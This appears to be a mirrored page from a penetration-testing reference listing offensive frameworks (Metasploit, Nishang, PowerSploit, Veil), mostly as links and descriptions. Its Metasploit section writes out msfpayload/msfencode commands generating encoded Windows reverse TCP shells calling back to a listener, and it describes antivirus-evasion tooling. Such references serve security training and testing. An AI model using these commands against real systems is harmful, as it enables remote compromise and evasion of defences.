Clone of https://github.com/rmusser01/Infosec_Reference . For those who would prefer to not be tracked by MS.
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
 
 

7.2 KiB

##Frameworks and Methodologies of all kinds!

PTES OSSTMM

Metasploit Framework

What is Metasploit?

This website should eventually be your go-to reference for Metasploit: https://metasploit.github.io/

  • It is the official “reference” page for the metasploit framework

Facts and Myths about AV Evasion with the Metasploit Framework

MSF/Meterpreter cmd reference

http://it-ovid.blogspot.com/2012/02/metasploit-and-meterpreter.html

Metasploit Framework - Payload Encoding List all available payloads and search for windows reverse tcp shellsmsfpayload -l | grep windows | grep shell | grep reverse | tcp

List available encoders msfencode -l

Reverse self-contained (not staged) command shell: 341 bytes msfpayload windows/shell_reverse_tcp LHOST=192.168.6.1 R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0b\x0d\x90' -t c

msfpayload windows/shell_reverse_tcp LHOST=192.168.6.1 R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0b\x0d\x90' -t c

Windows Command Shell, reverse Ordinal TCP Stager (Np NX or Win7) Use msf multi/handler to listen and upload remainder of the shellcode (stage 2)

msfpayload windows/shell/reverse_ord_tcp LHOST=192.168.6.1 R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0b\x0d\x90' -t c Generic Syntax

msfpayload | ./msfencode -e -b -t

Contributing to Metasploit

Writing an Exploit Writing an Exploit for Metasploit by Corelan Writing an Auxiliary module

Writing a Post-Exploitation module Style tips for writing a Metasploit module

Metasploit Framework Module Github

###Nishang Framework

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and during Penetraion Tests. Nishang is useful during various phases of a penetration test and is most powerful for post exploitation usage. It was made by https://twitter.com/nikhil_mitt

###PowerSploit Framework

Github

Windows exploitation framework composed of Powershell modules

###Veil Framework Veil-Evasion * Veil-Evasion is a tool to generate payload executables that bypass common antivirus solutions. Veil-Ordnance

  • Veil-Ordnance is a tool that can be used to quickly generate valid stager shellcode.

Veil-Framework *

Veil-Catapult

  • Veil-Catapult is a payload delivery tool that integrates with Veil-Evasion for payload generation.
  • Github

Veil-Pillage Veil-Pillage is a modular post-exploitation framework that integrates with Veil-Evasion for payload generation.

[Veil Power-View

  • Veil-PowerView is a powershell tool to gain network situational awareness on Windows domains. Veil-PowerView’s code is located at DomainTrustExplorer
  • Python script for analyis of the "Trust.csv" file generated by Veil PowerView. Provides graph based analysis and output. The graph output will represent access direction (opposite of trust direction)

Veil Tutorials:

More videos: https://www.veil-framework.com/guidesvideos/

Talks on Veil

Adventures in Asymmetric Warfare by Will Schroeder